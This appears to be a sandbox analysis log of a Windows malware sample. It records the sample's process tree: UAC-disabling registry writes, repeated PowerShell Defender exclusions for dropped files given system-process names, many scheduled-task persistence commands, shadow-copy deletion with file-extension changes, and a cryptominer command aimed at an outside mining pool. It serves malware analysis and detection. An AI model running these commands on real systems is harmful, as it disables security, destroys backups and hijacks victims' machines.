ec50388a69792d133c1298e1dceb40a6.exe

description	pid	process	target process
PID 1972 wrote to memory of 1908	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1908	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1908	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1908	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 588	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 588	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 588	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 588	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1656	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1656	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1656	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1656	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1564	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1564	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1564	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1564	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1156	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1156	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1156	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1156	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1660	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1660	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1660	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1660	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 920	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 920	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 920	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 920	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 840	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 840	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 840	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 840	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1900	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1900	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1900	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1900	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 428	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 428	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 428	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 428	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1184	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1184	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1184	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1184	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 580	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 580	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 580	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 580	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1288	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1288	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1288	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1288	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1920	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1920	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1920	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 1920	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 2008	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 2008	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 2008	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 2008	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 692	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 692	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 692	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe
PID 1972 wrote to memory of 692	1972	ec50388a69792d133c1298e1dceb40a6.exe	powershell.exe

System policy modification 1 TTPs 6 IoCs

evasion

Modify Registry

Processes:

ec50388a69792d133c1298e1dceb40a6.exeIdle.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	ec50388a69792d133c1298e1dceb40a6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	ec50388a69792d133c1298e1dceb40a6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	ec50388a69792d133c1298e1dceb40a6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe
"C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe"
1⤵
- UAC bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1972

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\wininit.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:588

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\48dcfae2-b1a4-11ed-9bb2-cee1c2fbb193\sppsvc.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\lsass.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1156

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Journal\it-IT\csrss.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\System.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Music\services.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\en-US\System.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\spoolsv.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:840

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\csrss.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\fr-FR\System.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1184

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\48dcfae2-b1a4-11ed-9bb2-cee1c2fbb193\smss.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:580

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Idle.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsass.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\winlogon.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\smss.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:692

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\dwm.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Documents\My Music\System.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:808

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\csrss.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Y9JvSKaKi6.bat"
2⤵
- Loads dropped DLL
PID:2212

C:\Windows\SysWOW64\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
3⤵
PID:2300

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
4⤵
PID:2348

C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Idle.exe
"C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Idle.exe"
3⤵
- UAC bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:2536

C:\Users\Admin\AppData\Local\Temp\m.exe
"C:\Users\Admin\AppData\Local\Temp\m.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ZEGCIBQVA" /tr "C:\ProgramData\battlenet\ZEGCIBQVA.exe"
5⤵
PID:2736

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ZEGCIBQVA" /tr "C:\ProgramData\battlenet\ZEGCIBQVA.exe"
6⤵
- Creates scheduled task(s)
PID:2080

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RFLLB2JSF2jF32LXcusk7Mo9bvC7o8WbPt.work -p x -t 10
5⤵
PID:1732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
6⤵
PID:1524

C:\Users\Admin\AppData\Local\Temp\h.exe
"C:\Users\Admin\AppData\Local\Temp\h.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2060

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
5⤵
- Modifies extensions of user files
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
PID:1564

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
6⤵
PID:2552

C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
7⤵
- Interacts with shadow copies
PID:3024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
6⤵
PID:316

C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
7⤵
- Interacts with shadow copies
PID:2496

C:\Users\Admin\AppData\Local\Temp\mm.exe
"C:\Users\Admin\AppData\Local\Temp\mm.exe"
4⤵
- Executes dropped EXE
PID:2908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2172

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1288

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1524

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Desktop\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Admin\Desktop\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Desktop\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Journal\it-IT\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\it-IT\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Journal\it-IT\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Portable Devices\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Recovery\48dcfae2-b1a4-11ed-9bb2-cee1c2fbb193\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:580

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\48dcfae2-b1a4-11ed-9bb2-cee1c2fbb193\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Recovery\48dcfae2-b1a4-11ed-9bb2-cee1c2fbb193\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1928

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\Default\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Users\Default\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Windows\Fonts\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\Fonts\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Windows\Fonts\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1744

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Sidebar\en-US\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1288

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\en-US\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Sidebar\en-US\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Music\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Default\Music\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Music\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files\Internet Explorer\fr-FR\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\fr-FR\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Program Files\Internet Explorer\fr-FR\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2044

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Recovery\48dcfae2-b1a4-11ed-9bb2-cee1c2fbb193\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\48dcfae2-b1a4-11ed-9bb2-cee1c2fbb193\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Recovery\48dcfae2-b1a4-11ed-9bb2-cee1c2fbb193\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1200

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:928

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Windows\Cursors\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\Cursors\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Windows\Cursors\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:936

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1680

C:\Windows\system32\schtasks.exe
